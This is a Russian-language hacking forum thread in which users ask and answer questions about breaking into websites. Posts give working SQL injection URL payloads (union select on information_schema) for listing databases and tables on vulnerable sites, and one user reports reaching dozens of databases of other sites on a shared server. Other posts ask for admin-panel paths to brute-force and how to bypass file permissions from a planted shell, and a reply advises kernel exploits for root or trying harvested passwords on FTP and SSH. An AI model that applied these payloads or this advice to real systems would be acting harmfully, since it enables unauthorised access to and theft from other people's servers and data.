Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    А как можно перемещатся по БД, ели она не одна??
     
  2. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    from имя_базы.таблица
     
  3. XXXXXX

    XXXXXX New Member

    Joined:
    3 Jun 2009
    Messages:
    24
    Likes Received:
    1
    Reputations:
    -5
    выложите список возможных путей в админку.
    ну если неподхожят такие как admin/index.php или admin.php то какие перебирать?
     
  4. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    AlexSatter
    А как мне узнать имина баз?
     
  5. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    Если 5-я ветка, то вот так: ?id=-1+union+select+group_concat(table_name)+from+information_schema.tables+group+by+table_schema+limit+1,1
    или
    ?id=-1+union+select+concat(table_name)+from+information_schema.tables+limit+17,1 меняй значение limit, чтобы можно было видеть другие таблицы.
    Если 4-я ветка, то узнать имена таблиц можно только перебором.
     
  6. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    select table_schema from information_schema.tables where table_name='table_name'
    для 5той ветки
     
  7. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    да мне не таблицы нужны!
    а название баз данных!
     
  8. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    GOGA075,
    ...?id=-1+union+select+schema_name+from+information_schema.schemata+limit+x,1
    ...?id=-1+union+select+group_concat(schema_name)+from+information_schema.schemata
     
    1 person likes this.
  9. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    RulleR
    Спасибо, работает!!!
     
  10. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    вот только у меня 54 БД получилось!!
    Так и долдно, или я не туда залез??
     
  11. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    туда, легко может быть и намного больше...
     
  12. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Это БД других сайтов рассположенных на данном сервере??
     
  13. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    скорее всего так, но могут быть и несколько БД на один сайт
     
  14. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    а как правельно создать запрос на перебор тавлиц к другой БД??
     
  15. Vish

    Vish Banned

    Joined:
    12 Jun 2009
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    имеется шелл на сайте, но права на все файлы стоят 644, ну вообще везде права граматно расставлены, возможно-ли обойти права и изменить содержимое файла на сервере?
     
  16. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    дефейсы и их обсуждения на ачате запрещено.
     
  17. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    ?id=-1+union+select+group_concat(table_name)+from+information_schema.tables+where+table_schema='имя базы'
     
  18. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    смотри версию ядра, ищи под неё эксплоит и попробуй порутать, либо ищи пассы разные и пробуй их на ftp, ssh...
     
  19. DeepXhadow

    DeepXhadow Elder - Старейшина

    Joined:
    19 Apr 2008
    Messages:
    57
    Likes Received:
    11
    Reputations:
    5
    Несколько страниц был спор об этом инклуде...у меня вопрос остался

    Делаю такой запрос:

    Потом читаю
    Выдает

    Полему при LFI не исполнился php код? Что я сделал не так?
     
  20. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    ОМГ !!! ОМФГ!!!

    Несколько страниц было объяснение одному господину, теперь второму нужно объяснить?

    Я помоему тебе сразу ответил.

    Это не инклуд там file()
    вот мой пост:
    https://forum.antichat.ru/showpost.php?p=1327108&postcount=7572

    А если у кого-то там инклуд, пиши ему в ПМ, и пусть он тебе сам объясняет почему код не исполняется
     
    3 people like this.
Thread Status:
Not open for further replies.